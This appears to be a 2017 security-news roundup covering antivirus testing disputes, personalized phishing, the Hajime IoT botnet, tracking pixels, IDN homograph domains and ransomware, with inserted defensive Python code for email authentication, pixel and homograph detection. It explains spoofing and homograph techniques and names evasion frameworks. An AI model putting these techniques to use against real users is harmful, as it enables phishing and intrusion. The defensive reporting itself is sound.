On Tuesday, Cylance's vice president of product testing and industry relations, Chad Skipper, blogged about the Ars article and the 'harmless' samples. He explained that Cylance doesn't simply use known malware for tests, but alters them via the mpress and vmprotect packers so they effectively become unknown malware. Sometimes, however, the packing doesn't fully work, and actually renders the original malware harmless. This, he suggests, is closer to the real-life situation faced by end users.
Not all the questions raised by the Ars article are fully explained by Skipper. "Of the nine files in question," writes Ars, "testing by the customer, by Ars, and by other independent researchers showed that only two actually contained malware." Skipper responded, "We don't give empty files on purpose -- it's just not what we do."
Nevertheless, if seven of the 48 samples were incorrectly detected as malware by Cylance, that's a pretty high false positive rate of just over 14.5% -- a rate that would not have been detected had not the engineer looked more closely at the testing results.
This has led to some suggestions that Cylance is gaming the system. "It's unbelievable that businesses today can't trust the people who they rely on to keep them secure," commented Mike Viscuso, CTO and co-founder of endpoint security firm Carbon Black. "The actions Cylance has taken puts their customers and our national security at risk."
"Not sure if it can be called cheating," said Luis Corrons, technical director at PandaLabs, a competitor in the endpoint security space; "anyway it is clear to me that ethics are not an obstacle for Cylance to get new customers. They do not allow testers to do comparative testing of their solution unless they impose their methodology, therefore there is a lack of independent testing to validate their marketing claims, so they ask their prospects to do their own tests, and they give them a preselected set of 'malware'." He added that if he were to do similar at Panda, "I would be fired."
Cylance claims that the majority of independent third-party tests are biased in favor of the incumbent vendors that use malware signature databases (as well as other techniques, including their own use of machine learning). Those vendors in turn suggest that some (not all) ML-based vendors seek to bias the testing in their own favor, and threaten lawsuits if they do not get their own way. The threat became reality earlier this year when CrowdStrike sued testing firm NSS Labs.
One of Skipper's arguments is that other vendors use the Anti Malware Testing Standards Organization's (AMTSO) Real Time Threat List (RTTL). This list is largely known by the vendors, and consequently does not provide a genuine test.
While this may be true for some vendors' own tests, it is not generally true for third-party testing. Lists such as RTTL and the WildList are mostly used for product certification, but not for comparative testing. Independent researcher David Harley explained, "They're of considerably less use for comparative testing, as the testing industry has always been aware. After all, the point of comparative testing is to differentiate between products. A test restricted to malware which is already known to vendors (or a substantial majority thereof) is not going to show enormous differences."
This was confirmed by an independent third-party tester who asked not to be named. He described four methods of acquiring malware samples: from a vendor; from VirusTotal; from a third-party source such as a large corporation; and lastly, by monitoring the threat landscape and acquiring threats and attack methods independently. He, and he believes the majority of test labs, use the last method.
"Tests that use malware gathered using the first three approaches could put Cylance at a disadvantage versus vendors that suck in lots of files and generate signatures," he told SecurityWeek. "But I'm not sure that it's fair to say that all vendors do that. It seems a bit old-fashioned and error-prone. I also don't think it makes the tests unfair. It simply highlights the inconvenient fact that there are loads of threats and Cylance's approach is not perfect because it doesn't provide full coverage. Sure, it is at a disadvantage -- but one of its own making, not because the testing is wrong."
Harley agrees with this basic viewpoint. "If comparative testing was about the exclusive use of cooperatively verified lists, it would still be more accurate than using samples supplied by a single vendor and containing a high percentage of garbage files."
John Shaw, VP product management at Sophos, also a player in the next-gen endpoint security market, pointed out that the Cylance arguments against the third-party testing industry could more accurately be aimed at Cylance itself. "The leading testing organizations," he told SecurityWeek, "are working to improve their ability to test products in a more representative 'real world' environment, using massively used techniques like infecting legitimate websites, and exploits against legitimate software. To do this at scale is hard and the industry still has a long way to go. Clearly for an individual customer to try and run a statistically significant test that simulates the real world is close to impossible, even with unlimited time." (Sophos previously published a stinging rebuke against Cylance's product comparison methods last summer.)
This doesn't mean it's impossible to self-test -- just very, very hard. "With testing," said Viscuso, "it's important to go beyond malware samples and test how the product handles real-world attacks. Malware samples alone are going to demonstrate one thing -- how well the product can stop the particular malware samples in your sample set. You're interested in stopping attacks, not just malware. Real world attackers don't rely on packed executables. They use documents, PowerShell, Python, Java, built-in OS tools, anything they can leverage to get the job done. To test the solution against real-world attack techniques, use a penetration testing framework such as Metasploit. Construct payloads with Veil-Evasion and use the techniques seen in real attacks. PowerShell Empire is also a great way to build PowerShell command lines and macro-enabled documents that go beyond executable malware samples."
It should be said that several vendors, including ML-based vendors and test laboratories, declined to comment: the issue is bitter and divisive. From those that did respond to SecurityWeek, the consensus is clear. Almost all agree that comparative third-party testing is difficult, but not impossible. And all but one agree that in rejecting independent testing, Cylance has replaced it with something far worse and potentially misleading. The exception is NSS Labs. "I don’t think Cylance did anything wrong," said Vikram Phatak, CEO of NSS Labs. "Their execution appears to have been problematic, but not their approach."
Personalized Spam and Phishing
20.4.2017 Kaspersky Spam
Most spam, especially the sort that is mass-mailed on behalf of businesses, has quite an impersonal format: spammers create a message template for a specific mailing purpose and often drastically diversify the contents of that template. Generally, these messages do not address the recipient personally and are limited to common phrases such as “Dear Client”. The most personal data ever involved is the name of the mailbox (or part of it), taken from the email address the spammer already has. Any specifics that would help the recipient ascertain whether the message is addressed personally to him, for example an existing account number, a contract number, or the date of its conclusion, are missing from the message. This impersonality, as a rule, attests to a phishing attempt.
Lately, however, we have been noticing an opposite tendency occurring quite often, wherein fraud becomes personalized and spammers invent new methods to persuade the recipient that the message is addressed personally to him. Thus, in the malicious mailing that we discovered last month, spammers used the actual postal addresses of the recipients in messages to make them seem as credible as possible. This information is sold to evildoers as ready-to-use databases with physical addresses (they are frequently offered for sale in spam messages), collected by evildoers from open sources, or obtained by evildoers when hacking email accounts, for example. Of course, cybercriminals will not have very many of these addresses at their disposal (compared to generated addresses), but they are much more valuable.
The way spammers organize their personalized attacks plays an important role as well. In general, messages are mass mailed on behalf of an existing company, while the technical headers of fake messages use the company’s actual details.
There are several ways to use valid details. The most unsophisticated method is spoofing, that is, substitution of the technical headers of a message. These headers can easily be set with any mass mailing program. In particular, during spoofing, the “From” field contains a real address of the impersonated sender that the fraudsters have obtained. In this case, spam is mass-mailed on behalf of the spoofed company, which can stain the company’s reputation quite seriously. Yet not all technical headers can be substituted when spoofing, and good anti-spam filters will not let these messages through.
Another method entails sending spam from so-called hijacked infrastructure, which is much harder to do technically, as the mail server of the target company has to be hacked. After gaining control over it, an evildoer can start sending messages with legitimate technical headers from any email address owned by the company and on behalf of any employee who works there. At the same time, the fake message looks quite credible for anti-spam filters and freely travels from server to server, as all of the necessary certificates and digital signatures in the header correspond to genuine counterparts. This would result in losses by both the recipient, who takes the bait of the evildoers (network infection and theft of personal data or business information), and the company, whose infrastructure is abused by the evildoers.
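The difference between the two methods described above can be made concrete with the check a receiving mail filter performs: does the domain in the “From” header align with a sending domain that passed SPF or DKIM? The following is an added example, not code from Kaspersky or from the article; the two messages are constructed, every domain and address in them is a placeholder, and the relaxed “last two labels” comparison is a simplification of the real public-suffix rule.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample messages for this example; all domains, addresses and the
# IP address are placeholders, not real senders.
SPOOFED = """\
From: Recruitment Desk <hr@recruiter.example>
To: victim@customer.example
Subject: Your order has been dispatched
Authentication-Results: mx.customer.example;
 spf=fail (sender IP 203.0.113.7 is not authorised) smtp.mailfrom=bulk.mailer.example;
 dkim=none (message not signed)

Your parcel to 12 Sample Street is on its way.
"""

# The same text sent through the company's own mail server: SPF and DKIM both
# pass for the From domain, so header checks alone cannot tell it from genuine mail.
ALIGNED = """\
From: Recruitment Desk <hr@recruiter.example>
To: victim@customer.example
Subject: Your order has been dispatched
Authentication-Results: mx.customer.example;
 spf=pass smtp.mailfrom=noreply@recruiter.example;
 dkim=pass header.d=recruiter.example

Your parcel to 12 Sample Street is on its way.
"""


def org_domain(domain):
    """Relaxed alignment: compare only the last two labels (a simplification of the public-suffix rule)."""
    return ".".join(domain.lower().split(".")[-2:])


def evaluate(raw_message):
    """Return ('pass' | 'reject', details) from the receiver's Authentication-Results header."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_dom = from_addr.rpartition("@")[2].lower()

    # Unfold the (possibly multi-line) header so the regexes see a single line.
    ar = " ".join(msg.get("Authentication-Results", "").split())
    results = dict(re.findall(r"\b(spf|dkim)=(\w+)", ar))

    m = re.search(r"smtp\.mailfrom=(?:[^@\s;]+@)?([\w.-]+)", ar)
    spf_dom = m.group(1) if m else ""
    m = re.search(r"header\.d=([\w.-]+)", ar)
    dkim_dom = m.group(1) if m else ""

    # DMARC-style alignment: a passing result only counts if its domain matches the From domain.
    spf_aligned = results.get("spf") == "pass" and org_domain(spf_dom) == org_domain(from_dom)
    dkim_aligned = results.get("dkim") == "pass" and org_domain(dkim_dom) == org_domain(from_dom)

    verdict = "pass" if (spf_aligned or dkim_aligned) else "reject"
    details = {
        "from": from_dom,
        "spf": (results.get("spf"), spf_dom),
        "dkim": (results.get("dkim"), dkim_dom),
    }
    return verdict, details


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("aligned", ALIGNED)):
        print(label, evaluate(raw))
```

The spoofed message is rejected because the “From” domain is backed by neither a passing SPF result nor a DKIM signature, while the aligned message passes. A message sent from hijacked infrastructure looks exactly like the aligned one, which is why such mail passes from server to server and why content-level controls are still needed.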
Usually, cybercriminals select small businesses (with up to several dozen employees) as victims for hacking. Owners of so-called parked domains are of particular interest, as parked domains are used by a company without creating a website on these domains.
In the samples detected by us, personalized malicious spam was mass-mailed on behalf of an existing business that was a small company specialized in staff recruitment. The messages contained order delivery notifications that are typical of malicious spam, but also indicated the real postal addresses of the recipients. The messages also contained URLs that were located on legitimate domains and were constantly changing throughout the mailings. If a user navigates to the URL, then malicious software will be downloaded to the user’s computer.
In this way, we may affirm that spam is becoming more personalized and mailings are becoming targeted. With the rising digital literacy of users, this is exactly what evildoers rely upon: it is not so easy to remember all your subscriptions, all your online orders, or where you’ve left your personal data, including addresses. Such an information load calls for the use of smart security solutions and the employment of security measures to protect your “information-driven personality”.
To Protect Your Devices, A Hacker Wants to Hack You Before Someone Else Does
19.4.2017 thehackernews Hacking
It should be noted that hacking into a system that does not belong to you, to gain unauthorised access, is an illegal practice, no matter what the actual intention behind it is.
Now I am pointing this out because reportedly someone, labeled a 'vigilante hacker' by the media, is hacking into vulnerable 'Internet of Things' devices in order to supposedly secure them.
This is not the first time a hacker has shown such vigilantism, as we have seen lots of previous incidents in which hackers used malware to compromise thousands of devices, but instead of exploiting them, forced the owners to make them secure.
Dubbed Hajime, the latest IoT botnet malware, used by the hacker, has already infected at least 10,000 home routers, Internet-connected cameras, and other smart devices.
But reportedly, it's an attempt to wrest control of them from Mirai and other malicious threats.
Mirai is an IoT botnet that threatened the Internet last year with record-setting distributed denial-of-service attacks against the popular DNS provider Dyn last October. The botnet is designed to scan for IoT devices that are still using default passwords.
How the Hajime IoT Botnet Works
Hajime botnet works much like Mirai — it spreads via unsecured IoT devices that have open Telnet ports and use default passwords — and also uses the same list of username and password combinations that Mirai botnet is programmed to use, with the addition of two more.
However, what's interesting about Hajime botnet is that, unlike Mirai, it secures the target devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be vectors used to attack many IoT devices, keeping Mirai and other threats at bay.
Unlike Mirai, Hajime uses a decentralized peer-to-peer network (instead of command and control server) to issue commands and updates to infected devices, which makes it more difficult for ISPs and Internet backbone providers to take down the botnet.
Hajime botnet also takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.
Besides this, Hajime botnet also lacks DDoS capabilities or any other hacking code except for the propagation code that lets one infected device search for other vulnerable devices and infects them.
One of the most interesting things about Hajime: the botnet displays a cryptographically signed message every 10 minutes or so on terminals. The message reads:
Just a white hat, securing some systems.
Important messages will be signed like this!
Hajime Author.
Contact CLOSED Stay sharp!
There's Nothing to Get Excited
No doubt, there's a temptation to applaud Hajime, but only until users reboot their hacked devices.
Since Hajime has no persistence mechanism and is loaded only into the device's RAM, once the IoT device is rebooted, it goes back to its unsecured state, complete with default passwords and the Telnet port open to the world.
"One day a device may belong to the Mirai botnet, after the next reboot it could belong to Hajime, then the next any of the many other IoT malware/worms that are out there scanning for devices with hard coded passwords. This cycle will continue with each reboot until the device is updated with a newer, more secure firmware," the Symantec researchers explained.
There's another problem...
Hacking someone to prevent hacking is not a thing, which is why we are also concerned about a related amendment passed by the United States — Rule 41 — which grants the FBI much greater powers to legally break into computers belonging to any country, take data, and engage in remote surveillance.
So, the most concerning issue of all — Is there any guarantee that the author of Hajime will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?
Tracking Pixels Used in Phishing Campaigns
19.4.2017 securityweek Phishing
Very small image files that can track user behavior have started to emerge in phishing campaigns, where hackers use them to gather information on their targets, Check Point researchers warn.
These very small image files are designed to send a string of code to an outside website. Usually only one pixel in size, these images can also be hidden by setting them to the same color as the background of a web page, which allows them to go unnoticed by the user. They can also be used in emails for the same purpose, and are called tracking pixels because of their small size and obvious purpose.
The code in these pixels is meant to ping the website when the image is downloaded, and can be designed to “capture information such as IP addresses, hostnames, operating systems, Web-browser types, dates the image was viewed, use of cookies, and other information,” Check Point explains.
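The two traits described above, a remotely hosted image with one-pixel dimensions or a hidden style, are exactly what a mail gateway or a mail client plugin can look for before it decides whether to fetch an image. The following is an added example, not code from Check Point or from the article: a small scanner over the HTML body of a message. The sample HTML is constructed, and the domains in it are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample HTML email body; domains are placeholders.
SAMPLE_EMAIL_HTML = """
<html><body>
<img src="https://cdn.shop.example/logo.png" width="120" height="40" alt="Shop">
<p>Your order has shipped.</p>
<img src="https://track.example/open.gif?rid=7f3a9c" width="1" height="1" alt="">
<img src="cid:signature-image" width="1" height="1">
<img src="http://track.example/p.png" style="display:none; width:1px">
</body></html>
"""


def _tiny(value):
    """True if a width/height attribute is 0 or 1 (with or without a px suffix)."""
    if value is None:
        return False
    digits = value.strip().lower().removesuffix("px")
    return digits.isdigit() and int(digits) <= 1


class PixelFinder(HTMLParser):
    """Collects <img> tags that look like tracking beacons."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        parsed = urlparse(src)
        # Only remotely fetched images can report back; inline 'cid:' or data: images cannot.
        if parsed.scheme not in ("http", "https"):
            return

        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1 dimensions")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if re.search(r"(width|height):[01]px", style):
            reasons.append("1px via CSS")

        # A query string is only reported once the image already looks like a beacon,
        # because ordinary CDN images legitimately carry query strings too.
        if reasons and parsed.query:
            reasons.append("carries a per-recipient query string")
        if reasons:
            self.findings.append((src, reasons))


def find_tracking_pixels(html):
    """Return a list of (src, reasons) for images that look like tracking pixels."""
    parser = PixelFinder()
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for src, reasons in find_tracking_pixels(SAMPLE_EMAIL_HTML):
        print(src, "->", ", ".join(reasons))
```

The logo is left alone, the inline signature image is skipped because it is not fetched from the network, and the two remote beacons are reported with the reason they were flagged. Blocking remote image loading by default, as most mail clients can be configured to do, prevents the ping entirely; this scanner is for the case where images are fetched and you want to know which ones should not be.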
This information is most often used by marketers to fine tune their advertising, but cybercriminals can also abuse the technique to gather information on cloud-platform components and discover known software vulnerabilities they can exploit in a later attack.
Check Point also explains that phishers can use tracking pixels in their attacks to learn which recipients are most likely to open their scam emails. Phishing attacks that leverage tracking pixels as a surveillance tool have been already observed in the wild, Check Point says.
“Since some scammers retool mass phishing attacks against random users to target high-value enterprise users, scammers are turning to pixel tracking to increase the odds a spear phishing attack will succeed,” the researchers reveal.
The researchers observed tracking pixels in phishing emails in August 2016, when in-place filters prevented the image from loading, which resulted in a red x placeholder image being displayed instead. These small images, Check Point says, threaten privacy in more than emails and web pages.
“For well over a decade, it has been understood that you can utilize tracking pixels in Microsoft Office files like Word documents, Excel spreadsheets and PowerPoint presentations. This works because Office files can link to an image located on a remote Web server. Putting a tracking pixel in an Office document allows you to be able to track a document’s activity as it moves through an organization,” the security firm notes.
While not found to be the direct cause of any specific security breach, tracking pixels are used for their surveillance capabilities in activities that precede attacks against users and infrastructure. The good news, however, is that it’s easy to stay protected.
Enterprises are advised to deploy email and anti-phishing security controls as part of their cloud-security arsenal, as well as to ensure that any software running in a cloud environment is patched at all times. Using web application security to protect any unpatched software should also help prevent intrusion. Looking for anomalous image placeholders when downloading pictures in advertising emails is also a good idea.
Critical vulnerability in Drupal References Module opens 120,000 Sites to hack
19.4.2017 securityaffairs Vulnerebility
A critical vulnerability affects the Drupal References module that is used by hundreds of thousands of websites using the popular CMS.
The Drupal security team has discovered a critical vulnerability in a third-party module named References.
The Drupal team published a Security advisory on April 12 informing its users of the critical flaw.
The flaw has a huge impact on the Drupal community because the affected module is currently used by more than 121,000 websites.
“The module is currently used by over 120 000 individual Drupal installations, but is no longer maintained. The last update was done in February 2013. Unfortunately, a critical security vulnerability in this references module has been reported by the Drupal core security team as SA-CONTRIB-2017-38:
Please note, the security team will not release information on this vulnerability for up to a month, the recommendation is to migrate. Emails asking for details on the vulnerability will not be responded to. If you would like to maintain the module, please follow the directions below.” states Drupal.
The References module allows users to add references between nodes for more complex information architectures.
The module was initially flagged by the Drupal development team as unsupported, as its last update was provided in February 2013.
The good news for References users is that, on April 14, the Drupal security team announced it was assigned to a new maintainer.
“2017-04-14 – A potential new maintainer is working through the process of fixing the References module. When this is complete a new release will be published and this SA will be updated.” reads the advisory.
A few days later, on April 18, the problem was fixed with the release of References 7.x-2.2.
The Drupal security team did not disclose the technical details of the vulnerability in order to avoid exploitation of the flaw in the wild. Unfortunately, it will be very difficult to upgrade websites that use the References module heavily.
“With a critical issue in an unsupported module so widely used, it is almost guaranteed that a large number of sites will be subject to attacks using this as a vector.” states Drupal. “Given the tradition of Drupal doing big backward breaks with regards to compatibility, some sites might be difficult to upgrade. Upgrading an enterprise site heavily using References may simply be impossible and hopefully drive the module to be maintained by a corporate entity.”
Drupal will release information on the critical vulnerability in the next few weeks.
Security experts believe threat actors could find the vulnerability by analyzing the source code of the module and could develop an exploit.
Drupal CMS is a privileged target for hackers that try to exploit vulnerabilities in outdated modules.
In June 2016, security experts warned of Drupalgeddon attacks against Drupal websites, more than 19 months after the public disclosure of CVE-2014-3704.
Oracle Patches Record Number of Vulnerabilities
19.4.2017 securityweek Vulnerebility
Oracle’s Critical Patch Update (CPU) for April 2017 contains 299 fixes, the highest number of any CPU to date.
More than half of the vulnerabilities could be remotely exploitable without authentication. 40 of the issues were rated Critical, and 25 had a CVSS score of 10.
Oracle Financial Services Applications was the most affected product, receiving fixes for 47 vulnerabilities this month, with 19 of them rated critical with a CVSS score of 10. Additionally, 25 of the 47 vulnerabilities may be remotely exploitable without authentication, Oracle’s advisory reveals.
Released this week, Oracle’s latest CPU addressed vulnerabilities in 25 applications: MySQL and Retail Applications (39 fixes each), Fusion Middleware (31), Sun Systems Products Suite (21), PeopleSoft (16), Virtualization (15), Berkeley DB (14), Support Tools (13), E-Business Suite (11), Communications Applications (11), Java SE (8), Utilities Applications (7), Primavera Products Suite (7), Hospitality Applications (6), Commerce (3), Database Server (2), Enterprise Manager Grid Control (2), and Secure Backup, Hyperion, Supply Chain Products Suite, JD Edwards Products, Siebel CRM, Health Sciences Applications, and Insurance Applications (1 each).
The most important of the addressed issues are related to the Remote Code Execution flaw in Apache Struts 2 that was found last month to be exploited in the wild after someone published a proof-of-concept (PoC) exploit. Cisco and VMware products were impacted as well.
“Cybercrime has always been a lucrative business. Nowadays, hackers set their eyes on enterprises more than on individuals, as they understood that it is more profitable. Taking into account that Oracle’s products are installed in the largest enterprises, these applications can be the ultimate target. The good news is that the vendor drew its attention to this critical area before a serious data breach happens. The bad news is that Oracle admins will long work on installing numerous patches,” Alexander Polyakov, CTO at ERPScan, says.
Oracle addressed critical bugs in the Solaris component of Oracle Sun Systems Products Suite, MySQL Enterprise Monitor component of Oracle MySQL (Struts 2), Oracle FLEXCUBE Private Banking component of Oracle Financial Services Applications (Struts 2), Oracle Financial Services Asset Liability Management component of Oracle Financial Services Applications (Struts 2), and Oracle Financial Services Data Integration Hub component of Oracle Financial Services Applications (Struts 2).
Over the past several quarters, Oracle has patched an increasing number of vulnerabilities with each new CPU. With 276 patches, the July 2016 CPU was the first to include over 250 fixes, and the trend continued each quarter since, with 253 flaws addressed in October 2016 and 270 in January 2017.
The trend is expected to continue in the following quarters as well. However, as usually happens with software, this doesn’t mean the applications are becoming more vulnerable, but that the researcher community is getting better at finding security issues.
Many Cybercriminals Prefer Skype for Communications: Study
19.4.2017 securityweek CyberCrime
Cybercriminals are increasingly interested in ensuring that their communications are encrypted, and the favorite tool of many appears to be Microsoft’s Skype, according to a new report from threat intelligence firm Flashpoint.
Data collected by Flashpoint from deep and dark web cybercrime communities between 2012 and 2016 shows that ICQ, Skype, Jabber, PGP, AOL Instant Messenger, Telegram, WeChat, QQ, WhatsApp, and Kik have been the most widely used tools.
The company’s study is based on the number of mentions on Russian, Spanish, French, Arabic, Chinese, Persian (Farsi) and English language forums typically used by profit-driven cybercriminals. The study does not include Signal and Line due to the fact that these are common words in English and programming languages, but experts believe their usage by threat actors is insignificant.
An analysis of Russian underground websites showed that ICQ was the most popular back in 2012 and accounted for more than half of mentions. Skype and Jabber also accounted for 26% and 19% of mentions, respectively. By 2016, Skype became the most mentioned messaging tool, with Jabber and ICQ dropping to the second and third positions.
On Spanish-speaking forums, Skype was in the lead in 2012, but last year it dropped to second place. The most mentioned messaging platform in 2016 was ICQ, with more than half of mentions.
Researchers believe ICQ has become more popular among Spanish-speaking cybercrooks due to the influence of more sophisticated hackers from Russian communities. In fact, Russian actors are considered the most innovative and sophisticated, and they are often trendsetters.
As for French-speaking communities, PGP was the most referenced in 2012, with nearly 60% of the total mentions. While not actually a messaging service, Flashpoint decided to include it in its study due to its popularity.
PGP continued to be popular on the French underground, but Jabber took the lead in 2016. Experts believe cybercriminals had started using it alongside PGP.
Skype was the most popular on Arabic-language forums back in 2012. WhatsApp was the most referenced last year, but Skype still managed to remain one of the favorites.
The situation has been different in China, where cybercriminals prefer applications developed by local tech company Tencent. Its QQ and WeChat apps accounted for more than 90% of mentions, both in 2012 and last year.
Persian-language communities also don’t appear to be influenced by others as much. In 2012, Yahoo Messenger was the most popular, and the favorite in 2016 was Telegram, with nearly 90% of all mentions. It’s worth noting that Flashpoint’s analysis of the Iranian underground is more general and it does not focus on financially motivated cybercrime.
On English-language underground websites, Skype was and remains the most mentioned application. In fact, Skype appears to be the most popular overall, being included in the top five messengers in all language groups.
According to Flashpoint, its study also shows that cybercriminals are increasingly interested in encrypted communications, a trend that is likely due to recent revelations of NSA surveillance, the proliferation of secure chat apps, and the influence of more sophisticated actors.
“The results of this study underscore the interconnected, agile nature of the cybercriminal ecosystem. Regardless of their language, skills, location, or affiliation, cybercriminal groups tend to share a strong desire to reap the benefits of cross-community collaboration, information sharing, and even mentorship,” Flashpoint said in its report.
“Such activities necessitate consistent access to reliable means of communication, which is why the digital communication tools examined within this study play such an integral role in facilitating cybercriminal behavior. In many instances, a cybercriminal’s livelihood may depend on his or her ability to communicate with peers while evading third-party detection. As such, the decision to utilize one communication tool over others is not taken lightly and often influenced by numerous contextual social, cultural, and geopolitical factors,” the company added.
Kaspersky Adds Password Manager to Bug Bounty Program
19.4.2017 securityweek Vulnerebility
Kaspersky Lab has informed researchers that its bug bounty program has been extended. The company has also decided to add a new product to its program and increase the maximum reward.
Kaspersky launched its HackerOne-powered bug bounty program in August 2016. The first phase, which lasted for six months and promised a total of $50,000 in bounties, led to the discovery of more than 20 flaws.
Given the program’s success so far, the security firm has decided to extend it and make some changes. Bug bounty hunters can now earn rewards for finding vulnerabilities in Kaspersky Password Manager 8. Until now, only Kaspersky Internet Security 2017 and Kaspersky Endpoint Security 10 were in scope.
The security firm also announced that the maximum reward for remote code execution vulnerabilities has been increased from $2,000 to $5,000. White hat hackers can earn, on average, $1,000 for local privilege escalation flaws and $2,000 for sensitive information disclosure issues. The minimum reward is $300.
“Since August, it is fair to say that our Bug Bounty Program has been successful in optimising our internal and external mitigation measures to continuously improve the resiliency of our products. That’s why we’ve decided to extend it,” said Nikita Shvetsov, Chief Technology Officer at Kaspersky Lab.
“We appreciate the enthusiastic participation of security researchers worldwide. As a mark of our respect for the work they do in helping us to bolster our solutions, we’ve increased the remuneration on offer in this second phase of the program and extended the scope to include other important Kaspersky Lab products,” Shvetsov added.
Google Project Zero researcher Tavis Ormandy has reported finding several vulnerabilities in Kaspersky products in the past years. The most recent, disclosed in January, was related to how the security firm’s products inspect SSL/TLS connections.
Chrome, Firefox Users Exposed to Unicode Domain Phishing
19.4.2017 securityweek Phishing
Malicious actors can create legitimate-looking phishing domains by leveraging the fact that some popular web browsers fail to properly protect their users against homograph attacks.
Web developer Xudong Zheng has demonstrated how an attacker could have registered the domain name “xn--80ak6aa92e.com,” which is displayed by web browsers such as Chrome, Opera and Firefox as “apple.com.”
Unicode is a standard for encoding and representing all characters and glyphs from all languages. Unicode characters can be used in Internet hostnames through Punycode. For instance, the Chinese word “短” is equivalent to “xn--s7y.”
Characters such as the Cyrillic “а” and the Latin “a” may look the same, but they are represented differently in Punycode, allowing malicious actors to create domains where Latin letters are replaced with similar-looking Greek or Cyrillic characters. This is known as an internationalized domain name (IDN) homograph attack.
Modern web browsers are designed to prevent these types of attacks – for example, "xn--pple-43d.com" will be displayed as "xn--pple-43d.com" instead of “apple.com.” However, Zheng discovered that this filter can be bypassed in Chrome, Firefox and Opera by creating the entire domain name using Cyrillic characters, leading to "xn--80ak6aa92e.com” being displayed as “apple.com.”
For a proof-of-concept (PoC), the expert registered the domain “xn--80ak6aa92e.com” and obtained a free digital certificate for it from Let’s Encrypt. When the domain is accessed via Opera, Chrome or Firefox, the user sees the domain name “apple.com” with a certificate issued for “apple.com.”
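The bypass described above comes down to two checks a browser (or a mail filter, or a URL-reputation service) can run on a hostname before showing it: decode the Punycode, then ask whether a label mixes scripts or, as in the PoC, is written entirely in a non-Latin script whose every letter imitates a Latin one. The following is an added example, not code from Zheng or from any browser vendor; the lookalike table is a constructed subset of Cyrillic and Greek letters, not the full Unicode confusables list that browsers consult, and the domains used are the page's own examples plus one placeholder.

```python
import unicodedata

# Constructed subset of letters that render like Latin letters in common fonts.
# This is an assumption for the example, not the full Unicode confusables table.
LATIN_LOOKALIKES = {
    "\u0430": "a",  # Cyrillic a
    "\u0435": "e",  # Cyrillic ie
    "\u043e": "o",  # Cyrillic o
    "\u0440": "p",  # Cyrillic er
    "\u0441": "c",  # Cyrillic es
    "\u0445": "x",  # Cyrillic ha
    "\u0443": "y",  # Cyrillic u
    "\u0456": "i",  # Cyrillic Byelorussian-Ukrainian i
    "\u0458": "j",  # Cyrillic je
    "\u0455": "s",  # Cyrillic dze
    "\u04bb": "h",  # Cyrillic shha
    "\u04cf": "l",  # Cyrillic palochka (the "l" in the apple.com PoC)
    "\u03bf": "o",  # Greek omicron
}


def decode_label(label):
    """Turn one DNS label into Unicode: Punycode ('xn--...') is decoded, plain ASCII is kept."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def decode_idn(domain):
    """Decode every label of a domain name, e.g. 'xn--s7y' -> '短'."""
    return ".".join(decode_label(label) for label in domain.split("."))


def scripts_in(label):
    """Return the set of scripts used by the letters in a label (digits and hyphens are ignored)."""
    found = set()
    for ch in label:
        name = unicodedata.name(ch, "")
        if name.startswith("LATIN"):
            found.add("Latin")
        elif name.startswith("CYRILLIC"):
            found.add("Cyrillic")
        elif name.startswith("GREEK"):
            found.add("Greek")
        elif ch.isalpha():
            found.add("Other")
    return found


def skeleton(label):
    """Replace each lookalike with the Latin letter it imitates."""
    return "".join(LATIN_LOOKALIKES.get(ch, ch) for ch in label)


def analyze(domain):
    """Return (decoded domain, findings). An empty findings list means nothing suspicious was seen."""
    decoded = decode_idn(domain)
    findings = []
    for label in decoded.split("."):
        used = scripts_in(label)
        # Mixed-script label: the check that catches "xn--pple-43d.com".
        if len(used) > 1:
            findings.append(f"{label}: mixes scripts {sorted(used)}")
        # Whole-script confusable: the check the PoC "xn--80ak6aa92e.com" slipped past.
        if not label.isascii() and skeleton(label).isascii():
            findings.append(f"{label}: non-Latin label that renders like '{skeleton(label)}'")
    return decoded, findings


if __name__ == "__main__":
    for name in ("apple.com", "xn--80ak6aa92e.com", "xn--pple-43d.com", "xn--s7y.example"):
        decoded, findings = analyze(name)
        print(name, "->", decoded, findings or "ok")
```

A genuine internationalized name such as the Chinese label from the article produces no finding, because its characters have no Latin lookalikes; the PoC domain is reported as a purely Cyrillic label that renders like “apple”. Showing the Punycode form whenever `analyze()` returns a finding is the same effect the Firefox `network.IDN_show_punycode` preference achieves for all IDNs.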
Wordfence has demonstrated the attack technique by spoofing the healthcare website “epic.com,” and experts at SANS have also provided some examples.
Zheng reported his findings to Google and Mozilla on January 20, and while the upcoming Chrome 58 will resolve the issue, Mozilla is still trying to figure out how to address the problem.
Mozilla initially classified the vulnerability report as “WONTFIX,” but later reopened it and assigned it a low severity rating. Until the organization comes up with a fix, Firefox users can protect themselves against potential attacks by typing “about:config” in the address bar to access advanced settings, and changing the “network.IDN_show_punycode” preference to “true.”
Edge, Internet Explorer and Safari are not affected. However, it’s worth noting that researchers did report recently that cybercriminals had been targeting Office 365 business email users by exploiting a weakness in how Office 365 handles Punycode.
Karmen Ransomware Deletes Decryptor If Sandbox is Detected
19.4.2017 securityweek Ransomware
Karmen Ransomware Deletes Decryptor Component When Detecting a Sandbox Environment or Analysis Software
A recently discovered Hidden Tear ransomware offspring is being sold on underground forums as a Ransomware-as-a-Service (RaaS), priced at just $175, Recorded Future researchers reveal.
Dubbed Karmen, the malware appears to have been around since December 2016, when incidents involving it were reported in Germany and the United States. However, the threat started being advertised on underground forums only in March.
